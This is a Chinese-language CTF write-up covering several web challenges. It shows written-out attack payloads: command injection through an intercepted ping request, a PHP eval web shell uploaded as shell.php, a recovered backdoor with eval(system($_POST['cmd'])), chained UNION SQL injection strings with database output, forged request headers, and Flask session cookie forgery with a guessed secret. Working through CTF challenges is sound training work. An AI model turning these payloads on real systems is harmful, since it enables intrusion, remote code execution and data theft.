我Flag呢?
在源码里面,Ctrl+U看一下。
Follow me and hack me
Ping
前端有过滤,只能输入ip,不能加点系统命令什么的。
抓包改包,发现可以执行系统命令,前面提到的前端验证猜想成立。
获得flag
导弹迷踪
前端小游戏,flag在源码里面,拼接一个NSSCTF就行啦。
PHP是世界上最好的语言!!
题目描述:
探姬坚信PHP是世界上最好的语言,于是她用PHP写了一个小工具 (Flag位于根目录)
payload:
system('cat /flag');
作业管理系统
查看源码,获得账号密码
进入管理界面,创建文件shell.php。
然后编辑,写入: GIF89a <?php eval ($_POST[jay17]); ?>
访问shell.php,执行命令
Vim yyds
先扫一下目录
这题是vim泄露,原理如下。
访问/.index.php.swp,下载一个文件如下(自己整了一下,太乱了):
</body> </main> </div> ?> } eval(system($_POST['cmd'])); echo "<p>Oh You got my password!</p>"; if ($_POST['password'] === base64_encode($password)) { echo "<p>can can need Vim </p>"; $password = "Give_Me_Your_Flag"; error_reporting(0); <?php <div class="can_can_vim"> </h3> 闃熼噷甯堝倕璇碫im鏄笘鐣屼笂鏈€濂界殑缂栬緫鍣紝涓嶆帴鍙楀弽椹? <h3 class="vim_said"> </div> </h1> Vim yyds <h1 class="vim_yyds"> <img src="https://www.bing.com/th?id=OSAAS.7B95FA2D97CE022F5E7949F60E350A25&pid=TechQna"></img> <div class="vim"> <main> <body> </head> </style> } font-size: 20; p { br, } align-items: center; justify-content: center; display: flex; color: #39c2ff; h3.vim_said { } margin-left: 5px; margin-top: 50; justify-content: center; align-items: flex-start; display: flex; color: #50f728; h1.vim_yyds { } height: auto; width: 8rem; border: none; img { } justify-content: center; vertical-align: middle; align-content: center; display: flex; div.vim { } justify-content: center; align-items: center; display: flex; html { body, <style type="text/css"> <meta charset="UTF-8"> <head> <html>
主要代码:
?> } eval(system($_POST['cmd'])); echo "<p>Oh You got my password!</p>"; if ($_POST['password'] === base64_encode($password)) { echo "<p>can can need Vim </p>"; $password = "Give_Me_Your_Flag"; error_reporting(0); <?php
感觉他是倒过来的,摆正一下。
<?php error_reporting(0); $password = "Give_Me_Your_Flag"; echo "<p>can can need Vim </p>"; if ($_POST['password'] === base64_encode($password)) { echo "<p>Oh You got my password!</p>"; eval(system($_POST['cmd'])); } ?>
payload:
password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=cat /flag
这是什么?SQL !注一下 !
题目描述:
为了安全起见多带了几个套罢了o(*▽*)q
直接给了查询语句,六个括号,那我就掏出我粗壮的联合注入狠狠的入了
爆库:
1)))))) and 1=2 union select 1,group_concat(schema_name) from information_schema.schemata#
information_schema,mysql,ctftraining,performance_schema,test,ctf
爆表:
1)))))) and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema="ctf"#
users
爆列:
1)))))) and 1=2 union select 1,group_concat(column_name)from information_schema.columns where table_name="users"#
id,username,password,ip,time,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password
获取值:
1)))))) and 1=2 union select 1,group_concat(password) from ctf.users#
彩蛋:F1rst_to_Th3_eggggggggg!}
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
重新爆表:
1)))))) and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema="ctftraining"#
flag,news,users
重新爆列:
1)))))) and 1=2 union select 1,group_concat(column_name)from information_schema.columns where table_name="flag"#
flag
重新获取值:
1)))))) and 1=2 union select 1,group_concat(flag) from ctftraining.flag#
Http pro max plus
题目描述:怎么还有一层…
伪造一下xff,6
安装一个插件(2条消息) 【测试】—如何用burpsuite伪造IP_通地塔的博客-CSDN博客
删掉xff,然后就过了第一个。(这个p什么什么的是什么我真不知道[狗头])
Referer:pornhub.com
User-Agent: Chrome
via:Clash.win
访问/wtfwtfwtfwtf.php
查看源码
/sejishikong.php
1zjs
先扫一下
/.gitignore
.idea .DS_Store package-lock.json logs *.log npm-debug.log* yarn-debug.log* yarn-error.log* dev node_modules coverage
/babel.config.js
module.exports = { presets: [ ['@babel/preset-env', { corejs: '3', useBuiltIns: 'usage' }] ], plugins: [ '@babel/plugin-transform-runtime' ] }
/package.json
{ "name": "creep-cube", "private": true, "description": "一个使用 Three.js 实现的魔方小游戏", "main": "dist/index.cjs.js", "module": "dist/index.esm.js", "jsdelivr": "dist/index.umd.js", "types": "types/index.d.ts", "scripts": { "dev": "rollup --config rollup.config.dev.js -w", "build": "rollup --config rollup.config.build.js" }, "homepage": "https://github.com/buuing/creep-cube", "bugs": "https://github.com/buuing/creep-cube/issues", "repository": "git+https://github.com/buuing/creep-cube.git", "author": "ldq <ldq404@qq.com>", "files": [ "dist", "types" ], "keywords": [ "Threejs魔方" ], "devDependencies": { "@babel/core": "^7.12.3", "@babel/plugin-transform-runtime": "^7.16.4", "@babel/preset-env": "^7.12.1", "@babel/runtime": "^7.16.3", "@rollup/plugin-commonjs": "^16.0.0", "@rollup/plugin-eslint": "^8.0.1", "@rollup/plugin-json": "^4.1.0", "@rollup/plugin-node-resolve": "^10.0.0", "@rollup/plugin-typescript": "^6.1.0", "@types/animejs": "^3.1.4", "@types/three": "^0.137.0", "@typescript-eslint/parser": "^4.14.0", "babel-plugin-external-helpers": "^6.22.0", "babel-preset-latest": "^6.24.1", "core-js": "^3.19.2", "eslint": "^7.18.0", "eslint-plugin-prettier": "^3.3.1", "prettier": "^2.2.1", "rollup": "^2.33.1", "rollup-plugin-babel": "^4.4.0", "rollup-plugin-delete": "^2.0.0", "rollup-plugin-dts": "^3.0.2", "rollup-plugin-livereload": "^2.0.0", "rollup-plugin-serve": "^1.1.0", "rollup-plugin-terser": "^7.0.2", "rollup-plugin-typescript2": "^0.30.0", "tslib": "^2.3.1", "tweakpane": "^3.0.7", "typescript": "^4.0.5" }, "dependencies": { "animejs": "^3.2.1", "three": "^0.135.0" } }
/tsconfig.json
{ "compilerOptions": { "target": "es5", // 编译后的es版本 "module": "esnext", // 前端模块化规范 "allowJs": true, // 允许引入js文件 "strict": true, // 开启严格模式 "importHelpers": true, "moduleResolution": "node", "skipLibCheck": true, "esModuleInterop": true, "allowSyntheticDefaultImports": true, "suppressImplicitAnyIndexErrors": true, "resolveJsonModule": true, "sourceMap": true, "declaration": true }, "exclude": [ "node_modules/**" ], "include": [ "src/**/*" ] }
审一下前端js,太长了,nnd。
访问/f@k3f1ag.php然后控制台跑一下jsfuck。
就当无事发生
https://github.com/ProbiusOfficial/ProbiusOfficial.github.io/commit/f04fe251bf8811324d4e71cd87b4b15581358490#diff-1474f5fa679c8ac3ff897f022f78e6d753c107596c85a05c06a7466478a3f437
Flag点击就送!
注:不要一开始名字就admin,要不然直接返回你怎么会是管理员看不到session
先随便输入一个名字,然后点击拿flag
可以看到抓到的包是有session的。一眼jwt。
好吧不是。
eyJuYW1lIjoiamF5In0.ZGCa_w.8Lc4BMfby2EluMdcKhltNqwyZxk
猜一下密钥,可能是session伪造。
**解密:**python flask_session_cookie_manager3.py decode -s “LitCTF” -c “eyJuYW1lIjoiamF5In0.ZGCa_w.8Lc4BMfby2EluMdcKhltNqwyZxk”
**加密:**python flask_session_cookie_manager3.py encode -s “LitCTF” -t “{‘name’: ‘admin’}”
获得flag
彩蛋
1/4
2/4
访问一下
3/4
扫一下
访问www.zip
4/4
1)))))) and 1=2 union select 1,group_concat(password) from ctf.users#
彩蛋:F1rst_to_Th3_eggggggggg!}